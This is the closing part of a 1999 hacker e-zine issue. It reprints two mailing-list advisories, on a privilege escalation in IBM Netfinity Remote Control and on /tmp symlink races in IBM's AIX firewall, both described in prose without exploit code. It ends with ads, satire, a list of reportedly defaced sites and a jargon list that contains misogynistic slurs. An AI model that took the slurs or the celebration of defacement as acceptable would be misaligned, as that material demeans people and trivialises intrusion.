54.0 Security Leak with IBM Netfinity Remote Control Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Tue, 25 May 1999 13:05:56 -0400
From: Russ
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Security Leak with IBM Netfinity Remote Control Software

On May 10th, 1999, Thomas Krug reported to NTBugtraq;

>Hi,
>
>I found a method to run programs like regedit and user manager with
>admin rights using the above tool. The following test scenario has
>been used:
>
>PC with Windows NT Workstation in a Domain
>Registry has been secured (especially HKLM)
>The User has no local admin rights and is in no admin group.
>The execution of regedit and regedt32 has been forbidden by system
>policy.
>
>When running the Netfinity Client and starting the process manager
>(view, close and execute processes) and run for instance
>regedit.exe or musrmgr.exe the programs run under the user
>configured with the netfinity service, either the system account
>or an admin.
>
>Thomas

After an incredibly difficult journey through the labyrinth of IBM's support groups, I finally spoke to a Ted McDaniels who, reportedly, was responsible for support of the IBM Netfinity RCS. After explaining Tom's issues with the product, Ted acknowledged that IBM Netfinity RCS was "built with very little security in mind". He also expressed doubt that any "fix" might be made to it to give it even the most rudimentary NT security understandings.

IBM did promise to send some sort of explanation to NTBugtraq regarding Thomas' findings, however, Ted has now gone on vacation and we're left with nothing from them. Can you detect how disappointed I am with IBM's reaction and handling of this issue?
Thomas' company was in the process of ripping out IBM Netfinity RCS when he originally submitted the issue, and all indications are that anyone using IBM Netfinity RCS, or considering using it, should do the same.

Bottom line, there is no way to control what a user can or cannot do with the "Process Manager" component of IBM Netfinity RCS, and clearly they are able to usurp all other controls you might have placed on your NT environment should the product be present. The service *must* be run as either SYSTEM or ADMINISTRATOR.

If anyone has found a way to avoid the *HUGE SECURITY HOLE* this product creates in an NT environment, please let us know.

Cheers,
Russ - NTBugtraq Editor

@HWA

55.0 IBM eNetwork Firewall for AIX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Tue, 25 May 1999 20:33:53 +0100
From: Paul Cammidge
To: BUGTRAQ@netspace.org
Subject: IBM eNetwork Firewall for AIX

The IBM eNetwork Firewall for AIX contains some poorly written scripts, which create temporary files in /tmp without making any attempt to validate the existence of the file. This allows any user with shell access to such a firewall to corrupt or possibly modify system files by creating links, pipes, etc with the same name. In a simple example submitted to IBM, /etc/passwd was overwritten. This example has been published on one of their support web pages as a 'local fix'.

The problem was reported to IBM early in January. To the best of my knowledge, the correct procedures have been followed. Initially, IBM responded by telling me that it was common practice for software to make use of /tmp. They suggested changing the permissions to prevent users from creating symbolic links to sensitive files.

An APAR (IR39562) was opened on 18/01/99 and closed on 13/03/99. The fix has not yet been released. This definitely applies to version 3.2, and probably others.
Anyone running this software who has users with shell accounts should be aware that the potential exists for these users to corrupt files which they don't have access to.

cheers

paul

--------------------------------------------------------------------------

Date: Sat, 29 May 1999 00:29:25 +0200
From: Marc Heuse
To: BUGTRAQ@netspace.org
Subject: Re: IBM eNetwork Firewall for AIX

Hi Paul,

> The IBM eNetwork Firewall for AIX contains some poorly written scripts,
> which create temporary files in /tmp without making any attempt to
> validate the existance of the file. This allows any user with shell
> access to such a firewall to corrupt or possibly modify system files by
> creating links, pipes, etc with the same name.

you are right, all their scripts have got link vulnerabilities ...

> The problem was reported to IBM early in January. To the best of my
> knowledge, the correct procedures have been followed. Initially, IBM
> responded by telling me that it was common practice for software to make
> use of /tmp. They suggested changing the permissions to prevent users
> from creating symbolic links to sensitive files.

when I found these in an audit at a customer in february, I opened an APAR too, but then discovered yours. When I saw that yours was opened a month before mine and not being dealt with, I made noise at IBM management and the AIX Security Team, so that they issued an emergency fix. But this fix is only available for those who know that it exists - anyway, the quick fix still has /tmp races all over the place - they just added "rm -f file" the line before writing into it ....

> An APAR (IR39562) was opened on 18/01/99 and closed on 13/03/99. The
> fix has not yet been released. This definately applies to version 3.2,
> and probably others.

I heard that the next IBM Firewall version will fix this ... bah - maybe with that quick "fix" ...

But to set one thing straight: It's *not* IBM's fault.
The IBM Firewall is a product of another company called Raleigh (I hope that's spelled correctly). In fact, the IBM AIX Security Team, especially Troy Bollinger, was very helpful in getting a fix - a correct one - out. It's the other company who writes security software but really seems to have no knowledge.

sad but true

Greets,
Marc

--
Marc Heuse, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
E@mail: marc@suse.de        Function: Security Support & Auditing
"lynx -source http://www.suse.de/~marc/marc.pgp | pgp -fka"
Key fingerprint = B5 07 B6 4E 9C EF 27 EE 16 D9 70 D4 87 B5 63 6C

@HWA

AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

*****************************************************************************
*                                                                           *
*   ATTRITION.ORG          http://www.attrition.org                         *
*   ATTRITION.ORG          Advisory Archive, Hacked Page Mirror             *
*   ATTRITION.ORG          DoS Database, Crypto Archive                     *
*   ATTRITION.ORG          Sarcasm, Rudeness, and More.                     *
*                                                                           *
*****************************************************************************
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Come.to/Canc0n99
http://come.to/Canc0n99

SYSTEM NEWS: Canc0n99 is looking for more speakers and industry people to attend with booths and talks. You could have a booth and presentation for the cost of little more than a doorprize (tba). Contact us at our main address for info, hwa@press.usmc.net; also join the mailing list for updates. This is the first Canadian event of its type and will have both white and black hat attendees. Come out and shake hands with the other side... *g* Mainly have some fun and maybe do some networking (both kinds). See ya there!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
!  *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ***          !
$$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$

www.2600.com  www.freekevin.com  www.kevinmitnick.com

########################################
# Support 2600.com and the Free Kevin  #
# defense fund site, visit it now!     #
# FREE KEVIN!                          #
########################################

One of our sponsors, visit them now: www.csoft.net

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV  *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCASTS TUES, SIMULCAST ON WBAI IN NYC @8PM  *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to         //
// hwa@press.usmc.net, put AD! in the subject header please. - Ed           //
//////////////////////////////////////////////////////////////////////////////

@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~

Don't worry. worry a *lot*

Send in submissions for this section please! .............

-----------------------------/-----------------------------

http://www.segfault.org/story.phtml?mode=2&id=36faccb8-03739440

NATO authorizes airstrikes on hackers

Silicon Valley, California -- Chat rooms were unusually deserted, spammers went on panicked last-minute mail-bombing sprees and bomb shelters filled to overflowing today as gloom engulfed hackers waiting for NATO strikes.

Hackers showed a mix of fear and defiance toward the Western military alliance, aware it could strike at any moment against strategic hacker targets after yet another embarrassing vandalism of a U.S.
Department of Defense website.

"This waiting for strikes is killing me," said w4r3z_f14r3, a 22-year-old
student in the controversial Computer Science department at the Massachusetts
Institute of Technology. "If they want to bomb us, they should do it now so I
can get back to cracking Afterlife II."

Graphics illegally uploaded to an Associated Press website accompanied a note
which stated, "F1n1$h 7h1Z 60mb1n9 0r f4c3 my uur47h, I 4m l337!!! H4x0rs
un173!" The web server was quickly downed in a flurry of flamewars over the
proper use of the word 'hacker' versus 'cracker' in the page.

Many college-age hackers stayed home rather than attending school, though most
admit they would have stayed home anyway.

Y2K websites issued detailed FAQs to threatened hackers in case of bombing,
including information on how long canned goods stay fresh in underground
shelters, how to fix a misfiring diesel generator, and how to sow grain in the
field with a plow and oxen.

Bomb shelters, unused in emergency since DefCon 4, were cleaned up during the
last NATO threat in August, when the alliance previously announced its
intention to launch airstrikes at the notorious hacker group Cult of the Dead
Cow. Most shelters have been turned into underground bunkers featuring ISDN
lines with triple-redundancy backups, as once the hackers moved in, they found
the absence of sunlight and social involvement enjoyable.

Despite the danger, supporters of hard-line hackers were defiant. "NATOns will
fire their missiles from a distance," said Lord Kreel, an NT cracker.
"Meanwhile, I will be cracking into the Pentagon with my friends in the
Lackeys of Terror. We plan to install Windows on all of their computers, which
will cripple their systems beyond repair."
Opponents of "black hat" hacking think NATO strikes will actually increase the
popularity of cracking among the techno-elite, but cement the popular image of
the hacker as a no-good techie pirate bent on stealing credit card numbers and
eating babies.

"Now, [crackers will] attack all the media sites, plastering the entire web
with links to porno and warez sites, and lag the whole net to hell", said
hacker Frodo Majere. "If NATO thinks they will bend hackers with bombs, they
are dead wrong."

Supporters of the infamous jailed hacker Kevin Mitnick have reportedly been
preparing to strike at well-known pro-NATO companies and military
organizations as soon as the first NATO bomb lands on hacker territory. "We'll
introduce Y2K bugs to systems where you'll never find them. We will end the
disgusting greed-infested system of monopolist capitalism by freeing
information forever. Linux is the One, True God," said one hacker, before he
was shot and killed by an enraged fanatic wearing a red "GNU NOT Linux"
headband, symbol of the underground terrorist organization FSF. A press
release issued by the FSF's guerilla leader, known only as RMS, claimed
responsibility for the killing.

NATO's secretary-general Javler Selena authorized airstrikes against known
hacker sites on Tuesday, after hackers on the IRC channel #2600 rebuffed a
last-ditch peace offer and gave out free root accounts on the whitehouse.gov
server.

"In the past, computer security was a war of escalation between system
administrators and joy-riding hackers," said a spokesperson for the
anti-hacker group Freedom Through Oppression. "It's high time we brought the
war to the instigators and bombed these hacker scum back to the Stone Age. To
make the Internet safe for everyone, we must squash dissension once and for
all. Countries have been nuked for less."
"If you don't stand up to the theft of intellectual property of innocent
companies such as SysMicrosoft and AppMicrosoft, you threaten American
competitiveness and the ability to innovate," said President Gates, as he
sought -- and got -- support from congressional leaders for military action.

"We must halt the hackers and save the Internet for our children and the
future of our country. The dirty, despicable hackers will no longer disrupt
websites to make fun of our institutions, or pollute the Information
Superhighway with filthy swear words," said former Vice President Al Gore,
founder of the Internet, before he suddenly toppled over and dumped core.
"NTLDR not found. INVALID_BOOT_DEVICE in kernel32.exe 006383dhX00029393."

Posted on Fri 26 Mar 00:21:38 1999 GMT
Written by Potato

-----------------------------/-----------------------------

You have to learn the lingo to become 31337

AOL - The best isp in the world. All of the real hax0rs use it.

bot - ereet program to 0wn you irc channel for you while you are gone, Curt is
the god of bots

chix0rs - girlies that hax0rs will never get because they ph33r them too much.

ftp - k-rad hax0ring utility used to get passwd files and warez. (if the
passwd file is shadow, make sure you get on irc and ask everyone how to
unshadow it.)

hax0r - Someone that punts, nukes, mailbombs, and 0wns everyone else and tells
them that repeatedly.

IRC - The place where lamers go to chat. The lamest channels are #2600, #hack,
#phreak, #hackphreak, etc. The only k-cool channels are #bastards on effnet,
#warez, and #gaycartoonsex.

lame - stupid, not leet, suck ass, "emmanuel goldstein is lame"

leet - (elite, eleet, 1337, 31337 etc.) good, cool, k-rad, "Cochise is leet"

Linux - The OS that lamers that think they are hax0rs use.

Microsoft Unix 98 - The super k-rad OS that every real hax0r uses.

progs - Tools that every hax0r must have for punting, mailbombing, scrolling,
etc.

pr0n - pictures of nekkid chix0rs.
(note: this is as close to a chix0r a hax0r will ever get.)

skilless whore - a stupid bitchx0r that thinks she knows everything, but
doesn't know anything. "Orin and Annie are skilless whores"

Warez - K-rad pirated software that every hax0r must trade.

http://neatoelito.org/hax0ring/jargon.html

- submitted by A.Silliman

@HWA

SITE.1

@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups
like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while; for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...

Looks like things are quieter than normal, perhaps with all the FBI action
that's going down and groups getting raided some people are becoming a little
antsy. Well, here's the list for this week according to HNN...

From HNN rumours section, http://www.hackernews.com/

May 24th

contributed by Anonymous

Cracked

It has been a busy weekend for some people. These are the sites that have been
reported to HNN as cracked. Please remember that this is the rumours section.
While most of these are verified we can't verify them all.
May 27th

From HNN rumours section; contributed by Anonymous

Cracked

These are the sites that have been reported to us as cracked.

http://do-nt.8j.net-2
http://data.digex.net
http://nation.com.pk
http://www.pak.gov.pk
http://www.the-dark-immortals.org

May 28th

From HNN rumours section; contributed by Anonymous

Cracked

The following websites have been reported as cracked

-------------------------------------------------------------------------

A.0 APPENDICES

_________________________________________________________________________

A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in
this file, there is now a links section on the
http://welcome.to/HWA.hax0r.news/ url so check there for current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html hack-faq

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html Original jargon file

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/ New jargon file

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.genocide2600.com/~tattooman/zines/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that have
security news from foreign countries for inclusion in this list thanks... - Ed

Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and
                best security related e-zine.

Got a link for this section? email it to hwa@press.usmc.net and i'll review it
and post it here if it merits it.
@HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]